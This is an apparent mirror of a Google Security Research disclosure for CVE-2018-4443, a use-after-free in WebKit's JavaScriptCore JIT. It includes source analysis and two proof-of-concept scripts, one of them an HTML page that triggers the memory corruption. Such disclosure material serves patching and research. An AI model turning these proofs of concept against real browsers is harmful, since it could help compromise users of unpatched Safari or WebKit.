WebKit JSC AbstractValue::set Use-After-Free

🗓️ 27 Dec 2018 00:00:00Reported by Google Security ResearchType

packetstorm🔗 packetstormsecurity.com👁 60 Views

WebKit JSC AbstractValue::set Use-After-Free CVE-2018-4443 vulnerabilit

Reporter	Title	Published	Views	Family All 64
0day.today	WebKit JSC AbstractValue::set Use-After-Free Exploit	29 Dec 201800:00	–	zdt
GithubExploit	Exploit for Incorrect Type Conversion or Cast in Redhat Enterprise_Linux_Desktop	16 Jan 201913:15	–	githubexploit
Tenable Nessus	Apple Safari < 12.0.2 Multiple Vulnerabilities	8 Apr 201900:00	–	nessus
Tenable Nessus	Apple iOS < 12.1.1 Multiple Vulnerabilities (APPLE-SA-2018-12-05-1)	17 Apr 201900:00	–	nessus
Tenable Nessus	Apple TV < 12.1.1 Multiple Vulnerabilities	21 Dec 201800:00	–	nessus
Tenable Nessus	Apple iOS < 12.1.1 Multiple Vulnerabilities	13 Dec 201800:00	–	nessus
Tenable Nessus	Apple iTunes < 12.9.2 Multiple Vulnerabilities (credentialed check)	19 Dec 201800:00	–	nessus
Tenable Nessus	macOS : Apple Safari < 12.0.2 Multiple Vulnerabilities	7 Dec 201800:00	–	nessus
Tenable Nessus	openSUSE Security Update : webkit2gtk3 (openSUSE-2019-108)	1 Feb 201900:00	–	nessus
Tenable Nessus	openSUSE Security Update : webkit2gtk3 (openSUSE-2019-308)	11 Mar 201900:00	–	nessus

`WebKit: JSC: A bug in AbstractValue::set   
  
CVE-2018-4443  
  
  
void AbstractValue::set(Graph& graph, RegisteredStructure structure)  
{  
RELEASE_ASSERT(structure);  
  
m_structure = structure;  
  
m_arrayModes = asArrayModes(structure->indexingType());  
m_type = speculationFromStructure(structure.get());  
m_value = JSValue();  
  
checkConsistency();  
assertIsRegistered(graph);  
}  
  
It works out m_arrayModes using structure->indexingType() instead of structure->indexingMode(). As structure->indexingType() masks out the CopyOnWrite flag, which indicates that the butterfly of the array is immutable, needing copy-on-write, the wrong information about the array can be propagated. As a result, it's able to write into the immutable butterfly (JSImmutableButterfly) of a CoW array. And this can lead to UaF as   
writing into an immutable butterfly can be used to bypass write barriers.  
  
I also noticed that the most calls to asArrayModes are using structure->indexingType(). I think that those should be fixed too.  
  
PoC:  
// ./jsc --useConcurrentJIT=false ~/test.js  
  
function set(arr, value) {  
arr[0] = value;  
}  
  
function getImmutableArrayOrSet(get, value) {  
let arr = [1];  
if (get)  
return arr;  
  
set(arr, value); // This inlinee is for having checkArray not take the paths using the structure comparison.  
set({}, 1);  
}  
  
function main() {  
getImmutableArrayOrSet(true);  
  
for (let i = 0; i < 100; i++) {  
getImmutableArrayOrSet(false, {});  
}  
  
let arr = getImmutableArrayOrSet(true);  
print(arr[0] === 1);  
}  
  
main();  
  
PoC 2 (UaF):  
<script>  
  
function sleep(ms) {  
let s = new Date();  
while (new Date() - s < ms) {  
  
}  
}  
  
function mark() {  
for (let i = 0; i < 40; i++) {  
new ArrayBuffer(1024 * 1024 * 1);  
}  
}  
  
function set(arr, value) {  
arr[0] = value;  
}  
  
function getImmutableArrayOrSet(get, value) {  
let arr = [1];  
if (get)  
return arr;  
  
set(arr, value);  
set({}, 1);  
}  
  
function main() {  
getImmutableArrayOrSet(true);  
  
for (let i = 0; i < 10000; i++)  
getImmutableArrayOrSet(false, {});  
  
sleep(500);  
  
let arr = getImmutableArrayOrSet(true);  
  
mark();  
getImmutableArrayOrSet(false, []);  
mark();  
  
setTimeout(() => {  
try {  
alert(arr[0]);  
} catch (e) {  
alert(e);  
}  
}, 200);  
}  
  
main();  
  
</script>  
  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available (whichever is earlier), the bug  
report will become visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`

27 Dec 2018 00:00Current

8.3High risk

Vulners AI Score8.3

EPSS0.18667